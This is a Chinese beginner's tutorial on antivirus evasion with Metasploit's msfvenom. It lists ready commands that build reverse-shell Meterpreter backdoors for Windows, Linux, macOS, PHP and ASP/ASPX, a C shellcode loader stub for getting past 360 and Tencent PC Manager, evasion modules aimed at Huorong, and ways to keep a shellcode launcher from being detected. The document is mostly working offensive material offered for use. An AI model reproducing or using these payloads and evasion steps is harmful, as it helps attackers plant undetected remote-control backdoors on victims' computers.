初学免杀
利用metasploit的msfvenom进行免杀处理
利用metasploit的msfvenom进行免杀处理
- msf的命令详解
点击查看代码
| -p, --payload | 指定payload |
| ------------------------ | ------------------------------ |
| --list payloads | 列出可以设置的payload选项 |
| -l, --list | 列出可用项 |
| -n, --nopsled | 指定 nop 在 payload 中的数量 |
| -f, --format | 指定文件输出格式 |
| --list formats | 列出可用输出格式 |
| -e, --encoder | 指定使用编码器 |
| --list encoders | 查看可用得编码器 |
| -a, --arch | 指定目标系统架构 |
| --platform | 指定目标系统 |
| --list platforms | 查看可用的目标系统 |
| -s, --space | 未经编码的 Payload 的最大长度 |
| --encoder-space <length> | 编码后的 Payload 的最大长度 |
| -b, --bad-chars | 设置在Payload 中避免出现的字符 |
| -i, --iterations | 设置 Payload 的编码次数 |
| -c, --add-code | 包含额外的win32 shellcode文件 |
| -x, --template | 指定特定的可执行文件作为模板 |
| -k, --keep | 保护模板程序的功能,注入的payload作为一个新的进程运行 |
| -o, --out | 保存 Payload 到文件 |
| -v, --var-name | 指定变量名 |
- 基本木马生成
点击查看代码
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=IP lport=port -f exe > shell.exe # 使用 监听模块exploit/multi/handler进行监听上线
- 常见的木马后门生成
点击查看代码
1. Windows
Msfvenom –platform windows –a x86 –p windows/meterpreter/reverse_tcp –i 3 –e x86/shikata_ga_nai –f exe –o route.exe
Msfvenom –platform windows –p windows/x64/meterpreter/reverse_tcp –f exe –o route.exe
2. Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > name.elf
3. MAC
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > name.macho
4. PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.153.138 LPORT =1520 -f raw > name.php
5. Asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > name.asp
6. Aspx
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f aspx > name.aspx
- 生成后门绕过360 和 管家
使用visual c++编码结合msf进行编写免杀
步骤
- 使用msf生成c的编码
点击查看代码
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikala_ga_nai -i 15 -b '\x00' lhost=ip lport=1250 -f c
- 打开visual c++ 创建一个win32 application
找到创建的项目.cpp 的点击右下角的file view 替换代码为以下的代码
点击查看代码
#include "stdafx.h"
#include <stdio.h>
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
unsigned char buf[] =
(这里放生成好的数组)
main()
{
((void(*)(void))&buf)();
}
- 测试效果 电脑管家
- 添加垃圾指令绕360
利用visual c++li的添加脚本文件
编译 组建一下即可绕过
- 使用msf evasion绕过火绒
利用模块
直接使用生成一个hta文件即可
- 效果
- msf的evaion其他模块可以看这个
https://blog.csdn.net/ab_bcd/article/details/120615426
shellcode
- shellcode github地址
https://github.com/clinicallyinane/shellcode_launcher/
步骤
- 首先使msfvenom 生成一个row的shellcode
点击查看代码
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=IP lport=port -f raw -o shellcode.raw
直接将生成row文件转移到下载shellcode的文件目录下面
直接在当前文件中启动cmd
运行shellcode
shellcode_launcher.exe -i shellcode.raw
直接的shellcode_launcher.exe可能报毒有几种方法解决
- 可以用visual studio 重新编译源码生成一个新的shellcode_launcher
- 可以删除一部分的注释
- 可以替换掉函数名等
